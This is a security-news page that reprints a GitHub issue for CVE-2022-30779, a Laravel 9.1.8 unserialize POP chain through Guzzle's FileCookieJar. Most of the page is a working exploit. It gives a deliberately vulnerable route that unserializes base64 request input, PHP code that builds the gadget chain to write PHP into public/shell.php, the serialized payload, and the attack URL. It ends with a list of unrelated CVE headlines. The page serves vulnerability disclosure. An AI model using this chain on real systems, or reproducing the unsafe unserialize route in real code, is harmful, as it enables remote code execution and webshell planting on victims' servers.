Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30779: Laravel 9.1.8 POP chain2 · Issue #2 · 1nhann/vulns

Laravel 9.1.8, when processing attacker-controlled data for deserialization, allows Remote Code Execution via an unserialize pop chain in __destruct in GuzzleHttp\Cookie\FileCookieJar.php.

CVE
Open in Source
#web#php#rce

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30779

build a route to test:

routes/web.php :

<?php

use Illuminate\Support\Facades\Route;

/* |--------------------------------------------------------------------------

Web Routes
Here is where you can register web routes for your application. These
routes are loaded by the RouteServiceProvider within a group which
contains the “web” middleware group. Now create something great!

*/

Route::get('/’, function (\Illuminate\Http\Request $request) { // return view(‘welcome’); $ser = base64_decode($request->input(“ser”)); unserialize($ser); return "ok"; });

poc

<?php

namespace GuzzleHttp\Cookie{ class SetCookie { private static $defaults = [ ‘Name’ => null, ‘Value’ => null, ‘Domain’ => null, ‘Path’ => '/’, ‘Max-Age’ => null, ‘Expires’ => null, ‘Secure’ => false, ‘Discard’ => false, ‘HttpOnly’ => false ]; function __construct() { $this->data[‘Expires’] = '<?php phpinfo();?>’; $this->data[‘Discard’] = 0; } } class CookieJar{ private $cookies = []; private $strictMode; function __construct() { $this->cookies[] = new SetCookie(); } } class FileCookieJar extends CookieJar{ private $filename; private $storeSessionCookies; function __construct() { parent::__construct(); $this->filename = "d:/var/www/untitled/public/shell.php"; $this->storeSessionCookies = true; } } } namespace{ $a = new \GuzzleHttp\Cookie\FileCookieJar(); echo base64_encode(serialize($a)); }

result :

TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MzY6ImQ6L3Zhci93d3cvdW50aXRsZWQvcHVibGljL3NoZWxsLnBocCI7czo1MjoiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAc3RvcmVTZXNzaW9uQ29va2llcyI7YjoxO3M6MzY6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAY29va2llcyI7YToxOntpOjA7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjQ6ImRhdGEiO2E6Mjp7czo3OiJFeHBpcmVzIjtzOjE4OiI8P3BocCBwaHBpbmZvKCk7Pz4iO3M6NzoiRGlzY2FyZCI7aTowO319fXM6Mzk6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAc3RyaWN0TW9kZSI7Tjt9

attack

http://127.0.0.1:1080/?ser=TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MzY6ImQ6L3Zhci93d3cvdW50aXRsZWQvcHVibGljL3NoZWxsLnBocCI7czo1MjoiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAc3RvcmVTZXNzaW9uQ29va2llcyI7YjoxO3M6MzY6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAY29va2llcyI7YToxOntpOjA7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjQ6ImRhdGEiO2E6Mjp7czo3OiJFeHBpcmVzIjtzOjE4OiI8P3BocCBwaHBpbmZvKCk7Pz4iO3M6NzoiRGlzY2FyZCI7aTowO319fXM6Mzk6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAc3RyaWN0TW9kZSI7Tjt9

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE